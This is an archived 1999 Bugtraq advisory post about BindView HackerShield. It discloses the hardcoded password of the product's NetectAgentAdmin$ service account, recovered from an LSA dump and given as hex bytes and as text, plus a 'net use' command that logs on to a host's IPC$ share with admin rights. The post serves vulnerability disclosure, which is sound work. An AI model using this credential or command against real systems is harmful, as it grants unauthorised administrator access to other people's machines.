[11921] in bugtraq
Bindview Hackershield Password
daemon@ATHENA.MIT.EDU (Eric Schultze)
Wed Sep 15 23:15:38 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.GSO.4.10.9909151824420.29994-100000@www.securityfocus.com>
Date: Wed, 15 Sep 1999 18:40:53 -0700
Reply-To: Eric Schultze <ews@SECURITYFOCUS.COM>
From: Eric Schultze <ews@SECURITYFOCUS.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This is a follow up to Simple Nomad's BindView HackerShield Advisory
Dumping the LSA password for the NetectAgentAdmin$ service, we get the
following hex codes:
6E 00 70 00 37 00 6D 00 34 00 71 00 4D 00 31 00
4D 00 37 00 56 00 54 00 09 00 3D 00
which equates to :
np7m4qM1M7VT<tab>=
The thirteenth character, a tab, makes this a difficult password to enter
from GUI applications. It's best to resort to command line to logon with
the username/password combo
net use \\172.16.1.101\ipc$ "np7m4qM1M7VT ="
/user:172.16.1.101\netectagentadmin$
"the CL above may be wrapped.)
NOTE: this account has admin privileges.
This information has been updated to the vulnerability record at:
http://www.securityfocus.com/bid.628.html
--eric
